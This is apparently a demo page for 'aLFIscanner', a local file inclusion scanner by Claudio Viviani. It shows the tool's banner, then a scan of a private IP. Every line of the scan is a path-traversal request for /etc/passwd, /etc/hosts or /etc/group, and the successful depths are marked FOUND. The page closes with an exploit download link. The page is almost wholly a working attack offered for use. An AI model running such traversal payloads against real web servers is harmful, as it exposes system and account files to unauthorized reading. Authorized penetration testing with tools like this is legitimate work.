[claudio@localhost ~]$ ./aLFIscanner.py -u 10.0.0.67 -t lfi.php?ID=

                  $$\       $$$$$$$$\ $$$$$$\
                  $$ |      $$  _____|\_$$  _|
         $$$$$$\  $$ |      $$ |        $$ |
         \____$$\ $$ |      $$$$$\      $$ |
         $$$$$$$ |$$ |      $$  __|     $$ |
        $$  __$$ |$$ |      $$ |        $$ |
        \$$$$$$$ |$$$$$$$$\ $$ |      $$$$$$\
         \_______|\________|\__|      \______|



         $$$$$$\
        $$  __$$\
        $$ /  \__| $$$$$$$\ $$$$$$\  $$$$$$$\  $$$$$$$\   $$$$$$\   $$$$$$\
        \$$$$$$\  $$  _____|\____$$\ $$  __$$\ $$  __$$\ $$  __$$\ $$  __$$\
         \____$$\ $$ /      $$$$$$$ |$$ |  $$ |$$ |  $$ |$$$$$$$$ |$$ |  \__|
        $$\   $$ |$$ |     $$  __$$ |$$ |  $$ |$$ |  $$ |$$   ____|$$ |
        \$$$$$$  |\$$$$$$$\$$$$$$$ |$$ |  $$ |$$ |  $$ |\$$$$$$$\ $$ |
         \______/  \_______|\_______|\__|  \__|\__|  \__| \_______|\__|

                                                                 An0th3r LFI sC4Nn3r v1.0

                                Written by:

                              Claudio Viviani

                           http://www.homelab.it

                              [email protected]
                           [email protected]

                      https://www.facebook.com/homelabit
                      https://twitter.com/homelabit
                      https://plus.google.com/+HomelabIt1/
            https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww


[*] URL:        http://10.0.0.67
[*] TARGET:     lfi.php?ID=
[*] PORT:       80

[+] http://10.0.0.67:80/lfi.php?ID=../etc/hosts
[+] http://10.0.0.67:80/lfi.php?ID=../../etc/hosts
[+] http://10.0.0.67:80/lfi.php?ID=../../../etc/hosts    <--- FOUND
[+] http://10.0.0.67:80/lfi.php?ID=../../../../etc/hosts         <--- FOUND
[+] http://10.0.0.67:80/lfi.php?ID=../../../../../etc/hosts      <--- FOUND
[+] http://10.0.0.67:80/lfi.php?ID=../../../../../../etc/hosts   <--- FOUND
[+] http://10.0.0.67:80/lfi.php?ID=../../../../../../../etc/hosts        <--- FOUND
[+] http://10.0.0.67:80/lfi.php?ID=../../../../../../../../etc/hosts     <--- FOUND
[+] http://10.0.0.67:80/lfi.php?ID=../../../../../../../../../etc/hosts  <--- FOUND
[+] http://10.0.0.67:80/lfi.php?ID=../../../../../../../../../../etc/hosts       <--- FOUND
[+] http://10.0.0.67:80/lfi.php?ID=../etc/passwd
[+] http://10.0.0.67:80/lfi.php?ID=../../etc/passwd
[+] http://10.0.0.67:80/lfi.php?ID=../../../etc/passwd   <--- FOUND
[+] http://10.0.0.67:80/lfi.php?ID=../../../../etc/passwd        <--- FOUND
[+] http://10.0.0.67:80/lfi.php?ID=../../../../../etc/passwd     <--- FOUND
[+] http://10.0.0.67:80/lfi.php?ID=../../../../../../etc/passwd  <--- FOUND
[+] http://10.0.0.67:80/lfi.php?ID=../../../../../../../etc/passwd       <--- FOUND
[+] http://10.0.0.67:80/lfi.php?ID=../../../../../../../../etc/passwd    <--- FOUND
[+] http://10.0.0.67:80/lfi.php?ID=../../../../../../../../../etc/passwd         <--- FOUND
[+] http://10.0.0.67:80/lfi.php?ID=../../../../../../../../../../etc/passwd      <--- FOUND
[+] http://10.0.0.67:80/lfi.php?ID=../etc/group
[+] http://10.0.0.67:80/lfi.php?ID=../../etc/group
[+] http://10.0.0.67:80/lfi.php?ID=../../../etc/group    <--- FOUND
[+] http://10.0.0.67:80/lfi.php?ID=../../../../etc/group         <--- FOUND
[+] http://10.0.0.67:80/lfi.php?ID=../../../../../etc/group      <--- FOUND
[+] http://10.0.0.67:80/lfi.php?ID=../../../../../../etc/group   <--- FOUND
[+] http://10.0.0.67:80/lfi.php?ID=../../../../../../../etc/group        <--- FOUND
[+] http://10.0.0.67:80/lfi.php?ID=../../../../../../../../etc/group     <--- FOUND
[+] http://10.0.0.67:80/lfi.php?ID=../../../../../../../../../etc/group  <--- FOUND
[+] http://10.0.0.67:80/lfi.php?ID=../../../../../../../../../../etc/group       <--- FOUND

Download

Download Exploit: HERE